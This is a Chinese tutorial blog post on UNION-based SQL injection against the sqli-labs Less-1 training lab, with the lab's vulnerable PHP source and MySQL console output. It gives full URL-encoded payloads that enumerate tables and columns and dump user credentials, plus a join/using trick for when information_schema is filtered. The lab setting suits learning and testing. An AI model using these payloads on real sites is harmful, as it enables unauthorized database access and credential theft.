SQL注入难不难

企业开发 2023-04-09 11:45:16 阅读次数: 0

目录

先浅浅的看一下第一关

 他让我们输入一个id

 第一次嘛看一下源代码喽

再说一下相关知识

实战

了解他的库和表

实战

 列名去哪查???

利用 join-using 注列名

扫描二维码关注公众号,回复: 14797741 查看本文章

本文主要讲述sql-labs上面的绕过方法,我主要采用的是小皮搭建

小皮搭建环境问题:

1、用apache别用nginx 记得改一下sql-connections里的db-creds.inc是用来连接数据库的

2、记得php版本不易太高

sql中的注释-- 和 # 

1,在我们进行sql注入的时候都需要将后面的代码注释掉,很多人都在使用--+其实是-- 

后面有一个空格经过URL code 编码的+,因为在你的注入语句后面有它本身的一个单引号

你需要将他闭合或者注释掉,可以--'也可以--+,如果使用注释必须加空格。

2,当我们使用#的时候,url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#,所以需要进行编码%23

首先我们去github上下载sql-labs的源码

GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

先浅浅的看一下第一关

 他让我们输入一个id

 第一次嘛看一下源代码喽

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

看到$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";因为id是单引号闭合的那就先给他传一个单引号,看他报错

报错就说明有注入点很开心

再说一下相关知识

外带数据的时候可以用and or union

在我们查的时候要知道库名,表名,列名,数据

想要联合查询就要知道他有几列

那我们来做个实验

mysql> select * from users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from users union select 1,2,3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | 2        | 3          |
+----+----------+------------+
9 rows in set (0.00 sec)

mysql>

很容易看出来当列不一致联合查询是不行的

再看一下

mysql> select * from users order by 1 asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by username asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by 2 asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql>

看完你就会很明白order by 可以进行列数量的窥探

实战

查看3列

 当查看到4列时

了解他的库和表

mysql> select * from users union select 1,user(),3;
+----+----------------+------------+
| id | username       | password   |
+----+----------------+------------+
|  1 | Dumb           | Dumb       |
|  2 | Angelina       | I-kill-you |
|  3 | Dummy          | p@ssword   |
|  4 | secure         | crappy     |
|  5 | stupid         | stupidity  |
|  6 | superman       | genious    |
|  7 | batman         | mob!le     |
|  8 | admin          | admin      |
|  1 | root@localhost | 3          |
+----+----------------+------------+
9 rows in set (0.00 sec)


mysql> select * from users union select 1,database(),3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | security | 3          |
+----+----------+------------+
9 rows in set (0.00 sec)

mysql> select * from users union select 1,version(),3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | 5.7.26   | 3          |
+----+----------+------------+
9 rows in set (0.16 sec)

mysql>

看完上面你又会懂,user(),database(),version()三个系统函数,总之查查查

实战

user()

 database()

version()

 
列名去哪查???

 sys

 information_schema

需要关注这两个表先看第二个

mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |   列
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              | 数据库名
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_LOCKS                          |
| INNODB_TRX                            |
| INNODB_SYS_DATAFILES                  |
| INNODB_FT_CONFIG                      |
| INNODB_SYS_VIRTUAL                    |
| INNODB_CMP                            |
| INNODB_FT_BEING_DELETED               |
| INNODB_CMP_RESET                      |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMPMEM_RESET                   |
| INNODB_FT_DELETED                     |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_LOCK_WAITS                     |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_FIELDS                     |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_BUFFER_PAGE                    |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_SYS_TABLESPACES                |
| INNODB_METRICS                        |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_CMPMEM                         |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_TABLESTATS                 |
+---------------------------------------+
61 rows in set (0.00 sec)

mysql>

接着看SCHEMATA

mysql> desc SCHEMATA;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    39
Current database: information_schema

+----------------------------+--------------+------+-----+---------+-------+
| Field                      | Type         | Null | Key | Default | Extra |
+----------------------------+--------------+------+-----+---------+-------+
| CATALOG_NAME               | varchar(512) | NO   |     |         |       |
| SCHEMA_NAME                | varchar(64)  | NO   |     |         |       |
| DEFAULT_CHARACTER_SET_NAME | varchar(32)  | NO   |     |         |       |
| DEFAULT_COLLATION_NAME     | varchar(32)  | NO   |     |         |       |
| SQL_PATH                   | varchar(512) | YES  |     | NULL    |       |
+----------------------------+--------------+------+-----+---------+-------+
5 rows in set (0.00 sec)


mysql> select SCHEMA_NAME  from  SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| security           |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql>

注意:当information_schema被过滤以后可以用sys,但是他只有库名,需要用join+using爆出表名。

查询一下

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20table_name%20from%20information_schema.tables),3%20--+

 显示子查询超过1行

我试一下不用子查询

代码

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables--+

 这明显查的是第一个库的第一个表

在他后面限制一下库名,他就可以查security的库啦

代码

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

 看一下数据库

 可以加一个limit,探测

代码

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1--+

这样太麻烦了

我么再用一下子查询

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+

当你把表都查出来了就开始查列名啦,将table改为column 再加上一个and 限制一下表名为users

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27),3%20--+

然后你就知道了库名(security),表名(users),列名(username,password)

然后正常查就可以啦

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20username,password%20from%20users),3--+

 

 但是会显示操作数列大于一行

然后咋办呢?那肯定是gruop_concat

代码

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,password)%20from%20users),3--+

 有点奇怪,加一个连接符

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)%20from%20users),3--+

这样就成功啦;

但是如果information被过滤了咋办,那就要请出我们的sys库啦

mysql> use sys;
Database changed
mysql> show tables;
+-----------------------------------------------+
| Tables_in_sys                                 |
+-----------------------------------------------+
| host_summary                                  |
| host_summary_by_file_io                       |
| host_summary_by_file_io_type                  |
| host_summary_by_stages                        |
| host_summary_by_statement_latency             |
| host_summary_by_statement_type                |
| innodb_buffer_stats_by_schema                 |
| innodb_buffer_stats_by_table                  |
| innodb_lock_waits                             |
| io_by_thread_by_latency                       |
| io_global_by_file_by_bytes                    |
| io_global_by_file_by_latency                  |
| io_global_by_wait_by_bytes                    |
| io_global_by_wait_by_latency                  |
| latest_file_io                                |
| memory_by_host_by_current_bytes               |
| memory_by_thread_by_current_bytes             |
| memory_by_user_by_current_bytes               |
| memory_global_by_current_bytes                |
| memory_global_total                           |
| metrics                                       |
| processlist                                   |
| ps_check_lost_instrumentation                 |
| schema_auto_increment_columns                 |
| schema_index_statistics                       |
| schema_object_overview                        |
| schema_redundant_indexes                      |
| schema_table_lock_waits                       |
| schema_table_statistics                       |
| schema_table_statistics_with_buffer           |
| schema_tables_with_full_table_scans           |
| schema_unused_indexes                         |
| session                                       |
| session_ssl_status                            |
| statement_analysis                            |
| statements_with_errors_or_warnings            |
| statements_with_full_table_scans              |
| statements_with_runtimes_in_95th_percentile   |
| statements_with_sorting                       |
| statements_with_temp_tables                   |
| sys_config                                    |
| user_summary                                  |
| user_summary_by_file_io                       |
| user_summary_by_file_io_type                  |
| user_summary_by_stages                        |
| user_summary_by_statement_latency             |
| user_summary_by_statement_type                |
| version                                       |
| wait_classes_global_by_avg_latency            |
| wait_classes_global_by_latency                |
| waits_by_host_by_latency                      |
| waits_by_user_by_latency                      |
| waits_global_by_latency                       |
| x$host_summary                                |
| x$host_summary_by_file_io                     |
| x$host_summary_by_file_io_type                |
| x$host_summary_by_stages                      |
| x$host_summary_by_statement_latency           |
| x$host_summary_by_statement_type              |
| x$innodb_buffer_stats_by_schema               |
| x$innodb_buffer_stats_by_table                |
| x$innodb_lock_waits                           |
| x$io_by_thread_by_latency                     |
| x$io_global_by_file_by_bytes                  |
| x$io_global_by_file_by_latency                |
| x$io_global_by_wait_by_bytes                  |
| x$io_global_by_wait_by_latency                |
| x$latest_file_io                              |
| x$memory_by_host_by_current_bytes             |
| x$memory_by_thread_by_current_bytes           |
| x$memory_by_user_by_current_bytes             |
| x$memory_global_by_current_bytes              |
| x$memory_global_total                         |
| x$processlist                                 |
| x$ps_digest_95th_percentile_by_avg_us         |
| x$ps_digest_avg_latency_distribution          |
| x$ps_schema_table_statistics_io               |
| x$schema_flattened_keys                       |
| x$schema_index_statistics                     |
| x$schema_table_lock_waits                     |
| x$schema_table_statistics                     |
| x$schema_table_statistics_with_buffer         |
| x$schema_tables_with_full_table_scans         |
| x$session                                     |
| x$statement_analysis                          |
| x$statements_with_errors_or_warnings          |
| x$statements_with_full_table_scans            |
| x$statements_with_runtimes_in_95th_percentile |
| x$statements_with_sorting                     |
| x$statements_with_temp_tables                 |
| x$user_summary                                |
| x$user_summary_by_file_io                     |
| x$user_summary_by_file_io_type                |
| x$user_summary_by_stages                      |
| x$user_summary_by_statement_latency           |
| x$user_summary_by_statement_type              |
| x$wait_classes_global_by_avg_latency          |
| x$wait_classes_global_by_latency              |
| x$waits_by_host_by_latency                    |
| x$waits_by_user_by_latency                    |
| x$waits_global_by_latency                     |
+-----------------------------------------------+
101 rows in set (0.00 sec)

mysql>

我们来看一下这个自增的表 schema_auto_increment_columns    

mysql> desc  schema_auto_increment_columns    ;
+----------------------+------------------------+------+-----+---------+-------+
| Field                | Type                   | Null | Key | Default | Extra |
+----------------------+------------------------+------+-----+---------+-------+
| table_schema         | varchar(64)            | NO   |     |         |       |
| table_name           | varchar(64)            | NO   |     |         |       |
| column_name          | varchar(64)            | NO   |     |         |       |
| data_type            | varchar(64)            | NO   |     |         |       |
| column_type          | longtext               | NO   |     | NULL    |       |
| is_signed            | int(1)                 | NO   |     | 0       |       |
| is_unsigned          | int(1)                 | NO   |     | 0       |       |
| max_value            | bigint(21) unsigned    | YES  |     | NULL    |       |
| auto_increment       | bigint(21) unsigned    | YES  |     | NULL    |       |
| auto_increment_ratio | decimal(25,4) unsigned | YES  |     | NULL    |       |
+----------------------+------------------------+------+-----+---------+-------+
10 rows in set (0.00 sec)

试图查一下列名

mysql> select column_name  from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+-------------+
| column_name |
+-------------+
| id          |
+-------------+
1 row in set (0.01 sec)

mysql>

好像只能查出一列来;

加了group_concat也不行

mysql> select group_concat(column_name)  from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+---------------------------+
| group_concat(column_name) |
+---------------------------+
| id                        |
+---------------------------+
1 row in set (0.01 sec)

mysql>

那么这个sys就查不出来列名啦,办法总是有的就是比较难,就是无列名注入。

利用 join-using 注列名

代码

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b)%20as%20c%20--+

这个代码的意思就是将users表当作a 在用join把users表当作b,将a,b合起来当作c来查询,这样查询就会将重复的列名爆出来。

 然后使用using加列名一个一个的进行突破

20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id))%20as%20c%20--+

 知道最后就全部突破

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id,username,password))%20as%20c%20--+

反引号中的数字代表几列

mysql> use security ;
Database changed
mysql> select `3` from (select 1,2,3 union select*from users) as a;
+------------+
| 3          |
+------------+
| 3          |
| Dumb       |
| I-kill-you |
| p@ssword   |
| crappy     |
| stupidity  |
| genious    |
| mob!le     |
| admin      |
+------------+
9 rows in set (0.00 sec)

mysql>

猜你喜欢

转载自blog.csdn.net/Jack_chao_/article/details/129855018
今日推荐
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
周排行
Family Tree 题解
BZOJ 1093 最大半连通子图 SCC + DP
幂等处理
Spring----学习(2)----XML 配置Bean 自动装配
SQL Server 远程更新目标表数据
HIbernate3.6 环境搭建
特殊符号正则表达式
【Linux】第一章 进程的理解
843. n-皇后问题(dfs+输出各种情况)
空间数据库2
每日归档
更多
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022